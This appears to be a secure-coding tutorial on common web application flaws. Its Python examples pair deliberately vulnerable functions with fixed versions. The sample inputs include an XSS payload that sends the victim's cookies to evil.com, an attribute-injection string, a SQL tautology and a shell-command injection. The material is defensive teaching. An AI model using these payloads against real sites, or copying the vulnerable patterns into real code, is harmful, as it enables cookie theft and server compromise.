Common Security Mistakes in Web Applications
1. Cross-site scripting (XSS)
Cross-site scripting is an attack in which attacker-supplied script runs in a victim's browser in the context of our website (let's call it www.mybiz.com). It usually happens because our site echoes untrusted input (a comment, a search term, a URL parameter) into a page without encoding it, so the browser parses the input as markup instead of text. The payload is often delivered as a link from the attacker's site (say evil.com), but it executes with the user's session on www.mybiz.com, where it can read cookies, send requests as the user, or rewrite the page.
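As an added example (not code from the original article), the following shows the mistake and the fix side by side: a greeting page that interpolates a user-supplied display name straight into HTML, and the same page with output encoding for the HTML text and attribute contexts. The attacker's display name and the function names are constructed for illustration.

```python
import html

# Constructed sample input: a "display name" an attacker registered on www.mybiz.com.
# If rendered unencoded, it ships the visitor's cookies to evil.com.
ATTACKER_NAME = '<script>location="http://evil.com/?c="+document.cookie</script>'


def render_greeting_vulnerable(display_name: str) -> str:
    """The classic XSS bug: user input interpolated directly into markup."""
    return f"<p>Welcome back, {display_name}!</p>"


def render_greeting_safe(display_name: str) -> str:
    """HTML text context: encode < > & " ' as entities so the browser treats
    the value as text, never as a tag or script."""
    return f"<p>Welcome back, {html.escape(display_name)}!</p>"


def render_link_safe(title: str) -> str:
    """HTML attribute context: quote=True (the default) also encodes quotes,
    so the value cannot close the title="..." attribute and add a handler."""
    return f'<a href="/profile" title="{html.escape(title, quote=True)}">profile</a>'


def contains_script_tag(rendered_html: str) -> bool:
    """Crude check used to demonstrate the difference between the two renderers."""
    return "<script" in rendered_html.lower()


if __name__ == "__main__":
    print(render_greeting_vulnerable(ATTACKER_NAME))
    print(render_greeting_safe(ATTACKER_NAME))
    print(render_link_safe('x" onmouseover="alert(1)'))
```

The encoding must match the context the value lands in: html.escape covers element text and quoted attributes, but a value placed inside a script block, a URL, or a CSS property needs that context's own encoding, and a templating engine that auto-escapes by default avoids forgetting the call.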
2. Cross-site request forgery (CSRF)
CSRF (sometimes abbreviated as XSRF) is an attack where a malicious site tricks our visitors' browsers into carrying out an action on our site, for example by auto-submitting a hidden form to www.mybiz.com while the visitor is logged in. It works because the browser attaches the user's session cookie to the forged request, so our server cannot distinguish it from a legitimate one unless the request carries something the attacker's page cannot obtain, such as a per-session token embedded in our own forms.
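As an added example (not from the original article), here is a synchronizer-token defence for a money-transfer form: the server stores a random token in the session, embeds it in the form it renders, and rejects any POST whose token does not match. The in-memory session store, the form fields, and the handler names are assumptions made for the illustration.

```python
import hmac
import secrets

# Constructed in-memory session store: session id -> session data.
# A real application would keep this in a server-side session backend.
SESSIONS = {}


def start_session() -> str:
    """Log a user in and mint a per-session CSRF token the attacker cannot read."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"csrf_token": secrets.token_urlsafe(32)}
    return sid


def render_transfer_form(sid: str) -> str:
    """Our own page embeds the session's token in a hidden field."""
    token = SESSIONS[sid]["csrf_token"]
    return (
        '<form method="POST" action="/transfer">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input name="to"><input name="amount"><button>Send</button></form>'
    )


def handle_transfer_vulnerable(sid: str, form: dict) -> str:
    """The mistake: trusting the session cookie alone. A form auto-submitted
    from evil.com arrives with the cookie and is accepted."""
    if sid not in SESSIONS:
        return "401 not logged in"
    return f"200 transferred {form['amount']} to {form['to']}"


def handle_transfer(sid: str, form: dict) -> str:
    """The fix: require the token, compared in constant time."""
    session = SESSIONS.get(sid)
    if session is None:
        return "401 not logged in"
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(submitted, session["csrf_token"]):
        return "403 CSRF token missing or invalid"
    return f"200 transferred {form['amount']} to {form['to']}"


if __name__ == "__main__":
    sid = start_session()
    # evil.com can make the browser send this request, but cannot read our token.
    forged = {"to": "attacker", "amount": "1000"}
    print(handle_transfer_vulnerable(sid, forged))
    print(handle_transfer(sid, forged))
```

The token only helps if the attacker cannot read it, which is exactly why an XSS hole on the same site defeats CSRF protection. Setting the session cookie with the SameSite attribute adds a second layer that does not depend on the application remembering to check the token on every state-changing route.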
3. Click-jacking
4. SQL injection
In this kind of attack, the attacker supplies input that the application concatenates into a SQL query, so part of the input is parsed as SQL rather than treated as data. Insufficient input validation, and above all building queries by string concatenation instead of using parameterized queries, lets them read or modify data they should not have access to, bypass logins, and in the worst case, depending on the database's configuration, run commands on the database server.
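As an added example (not from the original article), the block below builds a small in-memory SQLite table and runs a user lookup two ways: with the username concatenated into the query, and with a bound parameter. The table, the rows, and the payload are constructed for the illustration.

```python
import sqlite3

# Constructed sample data standing in for the site's user table.
SAMPLE_USERS = [("alice", "hash-of-alice-pw"), ("bob", "hash-of-bob-pw")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """The mistake: the username becomes part of the SQL text, so quotes and
    keywords inside it change the query's logic."""
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(sql)]


def find_user_safe(conn: sqlite3.Connection, username: str) -> list:
    """The fix: the SQL text is fixed and the value travels separately as a
    bound parameter, so it can only ever be compared as data."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


if __name__ == "__main__":
    conn = make_db()
    payload = "nobody' OR '1'='1"  # classic tautology: WHERE ... = 'nobody' OR '1'='1'
    print("vulnerable:", find_user_vulnerable(conn, payload))
    print("safe:      ", find_user_safe(conn, payload))
```

Escaping quotes by hand is not a substitute for parameters: escaping rules differ between databases and character sets, and a numeric column concatenated without quotes needs no quote at all to inject. Validation (an allowlist of characters for a username) is worth adding on top, but the parameterized query is the control that removes the bug.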
5. Shell injection
Similar to SQL injection, the attacker crafts an input string that the application passes to a system shell (for example a hostname handed to a ping or mail utility), so that part of the input runs as a command on your web server. Once they can run commands, they could potentially do a lot more. Depending on the privileges of the web server process, they could add JavaScript to your HTML pages, or gain access to other internal systems on your network.
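As an added example (not from the original article), the following shows a "look up this host" feature implemented three ways: a string handed to the shell, an argument list that bypasses the shell, and the argument list combined with an allowlist for the hostname. echo stands in for the real utility so the block runs anywhere; the payload and the hostname pattern are constructed for the illustration.

```python
import re
import subprocess

# Constructed attacker input: a hostname followed by a second shell command.
PAYLOAD = "example.com; echo PWNED"

# Allowlist for a DNS hostname (letters, digits, hyphens in dot-separated labels).
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def lookup_vulnerable(host: str) -> str:
    """The mistake: shell=True makes sh parse the string, so ';' ends our
    command and starts the attacker's."""
    result = subprocess.run(f"echo {host}", shell=True, capture_output=True, text=True)
    return result.stdout


def lookup_argv_only(host: str) -> str:
    """Better: no shell at all. The whole input is one argv entry, so ';'
    is just a character the program receives."""
    result = subprocess.run(["echo", host], capture_output=True, text=True)
    return result.stdout


def lookup_safe(host: str) -> str:
    """Best: argv list plus an allowlist, so the program never sees an
    argument that is not a plausible hostname (also blocks option injection
    such as a value starting with '-')."""
    if not HOSTNAME_RE.match(host):
        raise ValueError(f"rejected hostname: {host!r}")
    result = subprocess.run(["echo", host], capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    print("vulnerable:", repr(lookup_vulnerable(PAYLOAD)))
    print("argv only: ", repr(lookup_argv_only(PAYLOAD)))
    print("safe:      ", repr(lookup_safe("example.com")))
```

Avoiding the shell removes metacharacter interpretation, but the allowlist still matters: many utilities treat a leading "-" as an option, and some accept "@file" or URL-like arguments, so the argument must be validated against what the feature actually needs, not merely kept away from sh.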
6. Phishing
Phishing is the process where an attacker tricks your users into handing over their login credentials. The attacker may create a page on a domain they control that looks exactly like your login page, then send the user a link to it via e-mail, IM, Facebook, or something similar, and collect whatever the user types in.
The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software.
http://www.owasp.org/index.php/Main_Page